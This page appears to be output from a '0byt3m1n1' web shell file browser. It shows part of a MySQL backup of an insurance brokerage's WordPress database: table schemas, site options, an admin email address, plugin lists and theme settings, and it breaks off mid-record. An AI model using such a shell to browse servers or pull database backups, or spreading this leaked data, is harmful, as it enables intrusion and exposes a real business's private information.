0byt3m1n1
Path:
/
data
/
26
/
2
/
73
/
74
/
2888726
/
meta
/
3184463
/
mysql.backup
/
[
Home
]
File: empirewp.mysqlcluster1.bak.sql
-- MySQL dump 10.13 Distrib 5.6.24, for Linux (x86_64) -- -- Host: mysqlcluster1 Database: empirewp -- ------------------------------------------------------ -- Server version 5.6.32-78.1-56-log /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8 */; /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */; /*!40103 SET TIME_ZONE='+00:00' */; /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; -- -- Table structure for table `wp_ccpo_post_order_rel` -- DROP TABLE IF EXISTS `wp_ccpo_post_order_rel`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_ccpo_post_order_rel` ( `id` int(11) NOT NULL AUTO_INCREMENT, `category_id` varchar(250) NOT NULL, `post_id` int(11) NOT NULL, `incl` tinyint(1) NOT NULL DEFAULT '1', `weight` int(11) NOT NULL DEFAULT '0', PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_ccpo_post_order_rel` -- LOCK TABLES `wp_ccpo_post_order_rel` WRITE; /*!40000 ALTER TABLE `wp_ccpo_post_order_rel` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_ccpo_post_order_rel` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_commentmeta` -- DROP TABLE IF EXISTS `wp_commentmeta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_commentmeta` ( `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `comment_id` bigint(20) unsigned NOT NULL DEFAULT '0', `meta_key` varchar(255) DEFAULT NULL, `meta_value` longtext, PRIMARY KEY (`meta_id`), KEY `comment_id` (`comment_id`), KEY `meta_key` (`meta_key`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_commentmeta` -- LOCK TABLES `wp_commentmeta` WRITE; /*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_comments` -- DROP TABLE IF EXISTS `wp_comments`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_comments` ( `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT '0', `comment_author` tinytext NOT NULL, `comment_author_email` varchar(100) NOT NULL DEFAULT '', `comment_author_url` varchar(200) NOT NULL DEFAULT '', `comment_author_IP` varchar(100) NOT NULL DEFAULT '', `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `comment_content` text NOT NULL, `comment_karma` int(11) NOT NULL DEFAULT '0', `comment_approved` varchar(20) NOT NULL DEFAULT '1', `comment_agent` varchar(255) NOT NULL DEFAULT '', `comment_type` varchar(20) NOT NULL DEFAULT '', `comment_parent` bigint(20) unsigned NOT NULL DEFAULT '0', `user_id` bigint(20) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`comment_ID`), KEY `comment_post_ID` (`comment_post_ID`), KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`), KEY `comment_date_gmt` (`comment_date_gmt`), KEY `comment_parent` (`comment_parent`), KEY `comment_author_email` (`comment_author_email`(10)) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_comments` -- LOCK TABLES `wp_comments` WRITE; /*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_links` -- DROP TABLE IF EXISTS `wp_links`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_links` ( `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `link_url` varchar(255) NOT NULL DEFAULT '', `link_name` varchar(255) NOT NULL DEFAULT '', `link_image` varchar(255) NOT NULL DEFAULT '', `link_target` varchar(25) NOT NULL DEFAULT '', `link_description` varchar(255) NOT NULL DEFAULT '', `link_visible` varchar(20) NOT NULL DEFAULT 'Y', `link_owner` bigint(20) unsigned NOT NULL DEFAULT '1', `link_rating` int(11) NOT NULL DEFAULT '0', `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `link_rel` varchar(255) NOT NULL DEFAULT '', `link_notes` mediumtext NOT NULL, `link_rss` varchar(255) NOT NULL DEFAULT '', PRIMARY KEY (`link_id`), KEY `link_visible` (`link_visible`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_links` -- LOCK TABLES `wp_links` WRITE; /*!40000 ALTER TABLE `wp_links` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_options` -- DROP TABLE IF EXISTS `wp_options`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_options` ( `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `option_name` varchar(64) NOT NULL DEFAULT '', `option_value` longtext NOT NULL, `autoload` varchar(20) NOT NULL DEFAULT 'yes', PRIMARY KEY (`option_id`), UNIQUE KEY `option_name` (`option_name`) ) ENGINE=InnoDB AUTO_INCREMENT=25798 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_options` -- LOCK TABLES `wp_options` WRITE; /*!40000 ALTER TABLE `wp_options` DISABLE KEYS */; INSERT INTO `wp_options` VALUES (1,'siteurl','http://www.empireins.com','yes'),(2,'blogname','Empire Insurance Brokerage','yes'),(3,'blogdescription','Where Life Solutions are Beyond Expectations','yes'),(4,'users_can_register','0','yes'),(5,'admin_email','Cheskel@empireins.com','yes'),(6,'start_of_week','1','yes'),(7,'use_balanceTags','0','yes'),(8,'use_smilies','1','yes'),(9,'require_name_email','1','yes'),(10,'comments_notify','1','yes'),(11,'posts_per_rss','3','yes'),(12,'rss_use_excerpt','1','yes'),(13,'mailserver_url','mail.example.com','yes'),(14,'mailserver_login','login@example.com','yes'),(15,'mailserver_pass','password','yes'),(16,'mailserver_port','110','yes'),(17,'default_category','1','yes'),(18,'default_comment_status','open','yes'),(19,'default_ping_status','open','yes'),(20,'default_pingback_flag','1','yes'),(21,'posts_per_page','4','yes'),(22,'date_format','m/d/Y','yes'),(23,'time_format','g:i A T','yes'),(24,'links_updated_date_format','F j, Y g:i a','yes'),(25,'comment_moderation','0','yes'),(26,'moderation_notify','1','yes'),(27,'permalink_structure','/%postname%/','yes'),(28,'gzipcompression','0','yes'),(29,'hack_file','0','yes'),(30,'blog_charset','UTF-8','yes'),(31,'moderation_keys','','no'),(32,'active_plugins','a:6:{i:0;s:37:\"post-types-order/post-types-order.php\";i:1;s:35:\"sso-broker-gear/sso-broker-gear.php\";i:2;s:25:\"sso-surelc/sso-surelc.php\";i:3;s:17:\"wassup/wassup.php\";i:4;s:25:\"webpipesso/webpipesso.php\";i:5;s:25:\"wp-members/wp-members.php\";}','yes'),(33,'home','http://www.empireins.com','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'advanced_edit','0','yes'),(37,'comment_max_links','2','yes'),(38,'gmt_offset','0','yes'),(39,'default_email_category','1','yes'),(40,'recently_edited','a:5:{i:0;s:93:\"\\\\WDP\\DFS\\30\\4\\8\\5\\3013096584\\user\\sites\\3184463.site\\www/wp-content/themes/brokerage/404.php\";i:1;s:95:\"\\\\WDP\\DFS\\30\\4\\8\\5\\3013096584\\user\\sites\\3184463.site\\www/wp-content/themes/brokerage/style.css\";i:3;s:101:\"\\\\WDP\\DFS\\30\\4\\8\\5\\3013096584\\user\\sites\\3184463.site\\www/wp-content/themes/twentyfourteen/author.php\";i:4;s:97:\"\\\\WDP\\DFS\\30\\4\\8\\5\\3013096584\\user\\sites\\3184463.site\\www/wp-content/themes/twentyfifteen/404.php\";i:5;s:99:\"\\\\WDP\\DFS\\30\\4\\8\\5\\3013096584\\user\\sites\\3184463.site\\www/wp-content/themes/twentyfifteen/style.css\";}','no'),(41,'template','brokerage','yes'),(42,'stylesheet','brokerage','yes'),(43,'comment_whitelist','1','yes'),(44,'blacklist_keys','','no'),(45,'comment_registration','0','yes'),(46,'html_type','text/html','yes'),(47,'use_trackback','0','yes'),(48,'default_role','subscriber','yes'),(49,'db_version','30135','yes'),(50,'uploads_use_yearmonth_folders','1','yes'),(51,'upload_path','','yes'),(52,'blog_public','1','yes'),(53,'default_link_category','2','yes'),(54,'show_on_front','page','yes'),(55,'tag_base','','yes'),(56,'show_avatars','1','yes'),(57,'avatar_rating','G','yes'),(58,'upload_url_path','','yes'),(59,'thumbnail_size_w','150','yes'),(60,'thumbnail_size_h','150','yes'),(61,'thumbnail_crop','1','yes'),(62,'medium_size_w','300','yes'),(63,'medium_size_h','300','yes'),(64,'avatar_default','mystery','yes'),(65,'large_size_w','1024','yes'),(66,'large_size_h','1024','yes'),(67,'image_default_link_type','file','yes'),(68,'image_default_size','','yes'),(69,'image_default_align','','yes'),(70,'close_comments_for_old_posts','0','yes'),(71,'close_comments_days_old','14','yes'),(72,'thread_comments','1','yes'),(73,'thread_comments_depth','5','yes'),(74,'page_comments','0','yes'),(75,'comments_per_page','50','yes'),(76,'default_comments_page','newest','yes'),(77,'comment_order','asc','yes'),(78,'sticky_posts','a:0:{}','yes'),(79,'widget_categories','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(80,'widget_text','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:56:\"© 2014 Empire Insurance Brokerage. All Rights Reserved.\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}','yes'),(81,'widget_rss','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(82,'uninstall_plugins','a:1:{s:17:\"wassup/wassup.php\";s:16:\"wassup_uninstall\";}','no'),(83,'timezone_string','','yes'),(84,'page_for_posts','0','yes'),(85,'page_on_front','6','yes'),(86,'default_post_format','0','yes'),(87,'link_manager_enabled','0','yes'),(88,'initial_db_version','27916','yes'),(89,'wp_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:64:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:9:\"add_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:21:\"gravityforms_icontact\";b:1;s:31:\"gravityforms_icontact_uninstall\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),(90,'widget_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(91,'widget_recent-posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(92,'widget_recent-comments','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(93,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(94,'widget_meta','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(95,'sidebars_widgets','a:9:{s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:19:\"wp_inactive_widgets\";a:0:{}s:11:\"top_sidebar\";a:1:{i:0;s:13:\"top_sidebar-3\";}s:12:\"home_sidebar\";a:1:{i:0;s:14:\"contact_form-3\";}s:13:\"right_sidebar\";a:2:{i:0;s:14:\"contact_form-2\";i:1;s:24:\"featured_tools_sidebar-7\";}s:12:\"footer_area1\";a:1:{i:0;s:13:\"credit_line-2\";}s:12:\"footer_area2\";a:1:{i:0;s:11:\"newslater-2\";}s:12:\"footer_area3\";a:1:{i:0;s:13:\"social_medi-3\";}s:13:\"array_version\";i:3;}','yes'),(96,'cron','a:8:{i:1463166587;a:1:{s:24:\"wassup_scheduled_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1463168160;a:1:{s:20:\"wp_maybe_auto_update\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1463173826;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1463175211;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1463184922;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1463255186;a:1:{s:24:\"wassup_scheduled_dbtasks\";a:1:{s:32:\"46ff5e3a7965cf1fdd015443cbd2146f\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:1:{s:7:\"dbtasks\";a:1:{i:0;s:153:\"DELETE FROM `wp_wassup_tmp` WHERE `timestamp`<\'1463254545\' OR (`timestamp`<\'1463254965\' AND `username`=\'\') OR (`timestamp`<\'1463255085\' AND `spider`!=\'\')\";}}}}}i:1464232041;a:1:{s:24:\"wassup_scheduled_dbtasks\";a:1:{s:32:\"2a96908c8019fe2b58290fe61b74e068\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:1:{s:7:\"dbtasks\";a:1:{i:0;s:153:\"DELETE FROM `wp_wassup_tmp` WHERE `timestamp`<\'1464231400\' OR (`timestamp`<\'1464231820\' AND `username`=\'\') OR (`timestamp`<\'1464231940\' AND `spider`!=\'\')\";}}}}}s:7:\"version\";i:2;}','yes'),(124,'theme_mods_twentyfourteen','a:1:{s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1398116017;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}','yes'),(125,'current_theme','Brokerage','yes'),(126,'theme_mods_brokerage','a:55:{i:0;b:0;s:0:\"\";s:0:\"\";s:12:\"introduction\";s:475:\"<h3 style=\"margin: 0 0 10px;\">Welcome to the Options Framework demo.</h3>\n This is a slightly modified version of the original options framework by Devin Price with a couple of aesthetical improvements on the interface and some cool additional features. If you want to learn how to setup these options or just need general help on using it feel free to visit my blog at <a href=\"http://aquagraphite.com/2011/09/29/slightly-modded-options-framework/\">AquaGraphite.com</a>\";s:15:\"media_upload_35\";s:0:\"\";s:16:\"media_upload_356\";s:0:\"\";s:16:\"slider_example_1\";s:2:\"45\";s:16:\"slider_example_2\";s:2:\"75\";s:17:\"spinner_example_2\";s:2:\"75\";s:10:\"switch_ex1\";i:0;s:10:\"switch_ex2\";i:1;s:10:\"switch_ex3\";i:0;s:10:\"switch_ex4\";i:0;s:17:\"hidden_switch_ex1\";s:33:\"Hi, I\\\'m just a text input - nr 1\";s:17:\"hidden_switch_ex2\";s:33:\"Hi, I\\\'m just a text input - nr 2\";s:15:\"homepage_blocks\";a:2:{s:8:\"disabled\";a:4:{s:7:\"placebo\";s:7:\"placebo\";s:9:\"block_one\";s:9:\"Block One\";s:9:\"block_two\";s:9:\"Block Two\";s:11:\"block_three\";s:11:\"Block Three\";}s:7:\"enabled\";a:2:{s:7:\"placebo\";s:7:\"placebo\";s:10:\"block_four\";s:10:\"Block Four\";}}s:12:\"pingu_slider\";s:0:\"\";s:9:\"custom_bg\";s:56:\"[site_url]/wp-content/themes/brokerage/images/bg/bg0.png\";s:11:\"custom_type\";a:2:{s:4:\"size\";s:4:\"12px\";s:5:\"style\";s:11:\"bold italic\";}s:6:\"layout\";s:14:\"2c-l-fixed.css\";s:16:\"google_analytics\";s:0:\"\";s:11:\"footer_text\";s:48:\"Powered by [wp-link]. Built on the [theme-link].\";s:14:\"alt_stylesheet\";s:11:\"default.css\";s:15:\"body_background\";s:0:\"\";s:17:\"header_background\";s:0:\"\";s:17:\"footer_background\";s:0:\"\";s:9:\"body_font\";a:4:{s:4:\"size\";s:4:\"12px\";s:4:\"face\";s:5:\"arial\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#000000\";}s:10:\"custom_css\";s:0:\"\";s:10:\"typography\";a:4:{s:4:\"size\";s:4:\"12px\";s:4:\"face\";s:7:\"verdana\";s:5:\"style\";s:11:\"bold italic\";s:5:\"color\";s:7:\"#123456\";}s:6:\"border\";a:3:{s:5:\"width\";s:1:\"2\";s:5:\"style\";s:6:\"dotted\";s:5:\"color\";s:7:\"#444444\";}s:19:\"example_colorpicker\";s:0:\"\";s:21:\"example_colorpicker_2\";s:7:\"#2098a8\";s:9:\"test_text\";s:13:\"Default Value\";s:22:\"example_checkbox_false\";i:0;s:21:\"example_checkbox_true\";i:1;s:14:\"example_select\";s:5:\"three\";s:16:\"example_select_2\";s:3:\"two\";s:8:\"g_select\";s:13:\"Select a font\";s:9:\"g_select2\";s:13:\"Select a font\";s:13:\"example_radio\";s:3:\"one\";s:6:\"images\";s:11:\"warning.css\";s:16:\"example_textarea\";s:12:\"Default Text\";s:18:\"example_multicheck\";a:2:{s:5:\"three\";b:1;s:3:\"two\";b:1;}s:16:\"example_category\";s:18:\"Select a category:\";s:7:\"offline\";i:0;s:15:\"hidden_option_1\";s:26:\"Hi, I\\\'m just a text input\";s:15:\"hidden_option_2\";s:26:\"Hi, I\\\'m just a text input\";s:14:\"introduction_2\";s:207:\"<h3 style=\"margin: 0 0 10px;\">Grouped Options.</h3>\n You can group a bunch of options under a single heading by removing the \'name\' value from the options array except for the first option in the group.\";s:21:\"example_colorpicker_3\";s:7:\"#2098a8\";s:21:\"example_colorpicker_4\";s:7:\"#2098a8\";s:21:\"example_colorpicker_5\";s:7:\"#2098a8\";s:21:\"example_colorpicker_6\";s:7:\"#2098a8\";s:9:\"of_backup\";s:0:\"\";s:11:\"of_transfer\";s:0:\"\";s:9:\"smof_init\";s:31:\"Mon, 21 Apr 2014 21:39:41 +0000\";s:18:\"nav_menu_locations\";a:2:{s:7:\"primary\";i:2;s:9:\"secondary\";i:2;}}','yes'),(127,'theme_switched','','yes'),(129,'option_tree_settings','a:2:{s:8:\"sections\";a:3:{i:0;a:2:{s:2:\"id\";s:7:\"general\";s:5:\"title\";s:16:\"General Settings\";}i:1;a:2:{s:2:\"id\";s:13:\"SliderSetting\";s:5:\"title\";s:15:\"Slider Settings\";}i:2;a:2:{s:2:\"id\";s:3:\"seo\";s:5:\"title\";s:3:\"SEO\";}}s:8:\"settings\";a:8:{i:0;a:5:{s:2:\"id\";s:10:\"Background\";s:5:\"label\";s:15:\"Body Background\";s:4:\"desc\";s:44:\"Use any image or color from color chooser...\";s:4:\"type\";s:10:\"Background\";s:7:\"section\";s:7:\"general\";}i:1;a:5:{s:2:\"id\";s:8:\"logo_img\";s:5:\"label\";s:10:\"Logo Image\";s:4:\"desc\";s:24:\"Upload your desired Logo\";s:4:\"type\";s:6:\"upload\";s:7:\"section\";s:7:\"general\";}i:2;a:5:{s:2:\"id\";s:11:\"logo_slogan\";s:5:\"label\";s:11:\"Logo Slogan\";s:4:\"desc\";s:29:\"Insert your Site Slogan here.\";s:4:\"type\";s:4:\"text\";s:7:\"section\";s:7:\"general\";}i:3;a:5:{s:2:\"id\";s:10:\"FooterText\";s:5:\"label\";s:11:\"Footer Text\";s:4:\"rows\";s:1:\"5\";s:4:\"type\";s:8:\"textarea\";s:7:\"section\";s:7:\"general\";}i:4;a:9:{s:2:\"id\";s:9:\"my_slider\";s:5:\"label\";s:13:\"Slider Images\";s:4:\"desc\";s:0:\"\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:9:\"list-item\";s:7:\"section\";s:13:\"SliderSetting\";s:5:\"class\";s:0:\"\";s:7:\"choices\";a:0:{}s:8:\"settings\";a:3:{i:0;a:7:{s:2:\"id\";s:5:\"image\";s:5:\"label\";s:5:\"Image\";s:4:\"desc\";s:0:\"\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";s:5:\"class\";s:0:\"\";s:7:\"choices\";a:0:{}}i:1;a:7:{s:2:\"id\";s:6:\"title2\";s:5:\"label\";s:7:\"Title 2\";s:4:\"desc\";s:29:\"Enter second title of slider.\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"class\";s:0:\"\";s:7:\"choices\";a:0:{}}i:2;a:7:{s:2:\"id\";s:11:\"description\";s:5:\"label\";s:11:\"Description\";s:4:\"desc\";s:82:\"This text is used to add fancy captions in the slider. You can use HTML Tags here.\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";s:5:\"class\";s:0:\"\";s:7:\"choices\";a:0:{}}}}i:5;a:5:{s:2:\"id\";s:8:\"MetaTags\";s:5:\"label\";s:9:\"Meta Tags\";s:4:\"desc\";s:32:\"This section is for meta tags...\";s:4:\"type\";s:4:\"text\";s:7:\"section\";s:3:\"seo\";}i:6;a:6:{s:2:\"id\";s:16:\"MetaDescriptions\";s:5:\"label\";s:17:\"Meta Descriptions\";s:4:\"desc\";s:40:\"This section is for meta Descriptions...\";s:4:\"rows\";s:1:\"5\";s:4:\"type\";s:8:\"textarea\";s:7:\"section\";s:3:\"seo\";}i:7;a:6:{s:2:\"id\";s:15:\"GoogleAnalytics\";s:5:\"label\";s:16:\"Google Analytics\";s:4:\"desc\";s:91:\"This section is for Google Analytics. <br>Copy and paste your google tracking code here ...\";s:4:\"rows\";s:1:\"5\";s:4:\"type\";s:8:\"textarea\";s:7:\"section\";s:3:\"seo\";}}}','yes'),(134,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','yes'),(141,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(155,'recently_activated','a:0:{}','yes'),(202,'widget_social_media','a:6:{i:2;a:12:{s:5:\"title\";s:0:\"\";s:8:\"facebook\";s:0:\"\";s:7:\"twitter\";s:0:\"\";s:4:\"link\";s:0:\"\";s:4:\"yout\";s:0:\"\";s:5:\"gplus\";s:0:\"\";s:10:\"fb_img_url\";s:0:\"\";s:10:\"tw_img_url\";s:0:\"\";s:10:\"gp_img_url\";s:0:\"\";s:10:\"yt_img_url\";s:0:\"\";s:10:\"li_img_url\";s:0:\"\";s:8:\"footcopy\";s:0:\"\";}i:5;a:12:{s:5:\"title\";s:13:\"We are Social\";s:8:\"facebook\";s:20:\"http://facebook.com/\";s:7:\"twitter\";s:19:\"http://twitter.com/\";s:4:\"link\";s:0:\"\";s:4:\"yout\";s:0:\"\";s:5:\"gplus\";s:0:\"\";s:10:\"fb_img_url\";s:19:\"about-title-img.png\";s:10:\"tw_img_url\";s:19:\"about-title-img.png\";s:10:\"gp_img_url\";s:0:\"\";s:10:\"yt_img_url\";s:0:\"\";s:10:\"li_img_url\";s:0:\"\";s:8:\"footcopy\";s:0:\"\";}i:6;a:12:{s:5:\"title\";s:13:\"We are 